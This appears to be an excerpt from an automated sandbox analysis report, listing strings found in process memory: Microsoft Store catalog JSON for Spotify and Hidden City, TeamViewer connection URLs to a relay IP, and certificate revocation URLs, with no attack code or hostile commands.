Source: svchost.exe, 0000000E.00000003.479875283.000001C495993000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-09-03T08:13:47.6485296Z||.||9eff4c9e-5599-4773-81dc-0299af880dd5||1152921505693851877||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 0000000E.00000003.479875283.000001C495993000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-09-03T08:13:47.6485296Z||.||9eff4c9e-5599-4773-81dc-0299af880dd5||1152921505693851877||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 0000000E.00000003.479875283.000001C495993000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV"," equals www.facebook.com (Facebook)
Source: svchost.exe, 0000000E.00000003.479875283.000001C495993000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV"," equals www.twitter.com (Twitter)
Source: svchost.exe, 0000000E.00000003.464414339.000001C495983000.00000004.00000001.sdmp String found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detec equals www.facebook.com (Facebook)
Source: svchost.exe, 0000000E.00000003.464414339.000001C495983000.00000004.00000001.sdmp String found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detec equals www.twitter.com (Twitter)
Source: svchost.exe, 0000000E.00000003.464414339.000001C495983000.00000004.00000001.sdmp String found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detec equals www.youtube.com (Youtube)
Source: svchost.exe, 0000000E.00000003.463719748.000001C495E03000.00000004.00000001.sdmp String found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac
Source: svchost.exe, 0000000E.00000003.463719748.000001C495E03000.00000004.00000001.sdmp String found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac
Source: svchost.exe, 0000000E.00000003.463719748.000001C495E03000.00000004.00000001.sdmp String found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac
Source: TeamViewer.exe, 00000003.00000003.412973505.000000000576A000.00000004.00000001.sdmp String found in binary or memory: http://37.252.232.109/
Source: TeamViewer.exe, 00000003.00000003.412973505.000000000576A000.00000004.00000001.sdmp String found in binary or memory: http://37.252.232.109/000&client=DynGate&rnd=197887096&p=10000001l
Source: TeamViewer.exe, 00000003.00000003.412973505.000000000576A000.00000004.00000001.sdmp String found in binary or memory: http://37.252.232.109/32172969&client=DynGate&p=10000002v
Source: TeamViewer.exe, 00000003.00000003.412973505.000000000576A000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000003.412486792.00000000056C9000.00000004.00000001.sdmp String found in binary or memory: http://37.252.232.109/din.aspx?s=00000000&m=fast&client=DynGate&rnd=197887096&p=10000001
Source: TeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmp String found in binary or memory: http://37.252.232.109/din.aspx?s=00000000&m=fast&client=DynGate&rnd=197887096&p=10000001l
Source: TeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmp String found in binary or memory: http://37.252.232.109/din.aspx?s=00000000&m=fast&client=DynGate&rnd=197887096&p=10000001q
Source: TeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmp String found in binary or memory: http://37.252.232.109/din.aspx?s=00000000&m=fast&client=DynGate&rnd=197887096&p=10000001s
Source: TeamViewer.exe, 00000003.00000002.753222429.0000000003A1C000.00000004.00000001.sdmp String found in binary or memory: http://37.252.232.109/din.aspx?s=12852408&m=fast&client=DynGate&p=10000
Source: TeamViewer.exe, 00000003.00000002.754226459.000000000579E000.00000004.00000001.sdmp String found in binary or memory: http://37.252.232.109/din.aspx?s=12852408&m=fast&client=DynGate&p=10000002
Source: TeamViewer.exe, 00000003.00000003.412973505.000000000576A000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000003.412486792.00000000056C9000.00000004.00000001.sdmp String found in binary or memory: http://37.252.232.109/dout.aspx?s=12852408&p=10000001&client=DynGate
Source: TeamViewer.exe, 00000003.00000002.751027599.0000000000B09000.00000004.00000001.sdmp String found in binary or memory: http://37.252.232.109/dout.aspx?s=12852408&p=10000001&client=DynGate0
Source: TeamViewer.exe, 00000003.00000002.751027599.0000000000B09000.00000004.00000001.sdmp String found in binary or memory: http://37.252.232.109/dout.aspx?s=12852408&p=10000001&client=DynGateP
Source: TeamViewer.exe, 00000003.00000002.753222429.0000000003A1C000.00000004.00000001.sdmp String found in binary or memory: http://37.252.232.109/dout.aspx?s=12852408&p=10000002&client=
Source: TeamViewer.exe, 00000003.00000003.412973505.000000000576A000.00000004.00000001.sdmp String found in binary or memory: http://37.252.232.109/dout.aspx?s=12852408&p=10000002&client=DynGate
Source: TeamViewer.exe, 00000003.00000002.751027599.0000000000B09000.00000004.00000001.sdmp String found in binary or memory: http://37.252.232.109/dout.aspx?s=12852408&p=10000002&client=DynGate2
Source: TeamViewer.exe, 00000003.00000002.751027599.0000000000B09000.00000004.00000001.sdmp String found in binary or memory: http://37.252.232.109/dout.aspx?s=12852408&p=10000002&client=DynGateY
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.dr String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.479621108.000001C49590B000.00000004.00000001.sdmp, svchost.exe, 00000014.00000002.749355403.00000282E9C72000.00000004.00000001.sdmp, nso5B2F.tmp.1.dr String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: svchost.exe, 0000000E.00000002.491168196.000001C4950E3000.00000004.00000001.sdmp, svchost.exe, 00000014.00000002.749355403.00000282E9C72000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.dr String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.dr String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: svchost.exe, 0000000E.00000002.491168196.000001C4950E3000.00000004.00000001.sdmp, svchost.exe, 00000014.00000002.749228779.00000282E9C16000.00000004.00000001.sdmp String found in binary or memory: http://crl.ver)
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.dr String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
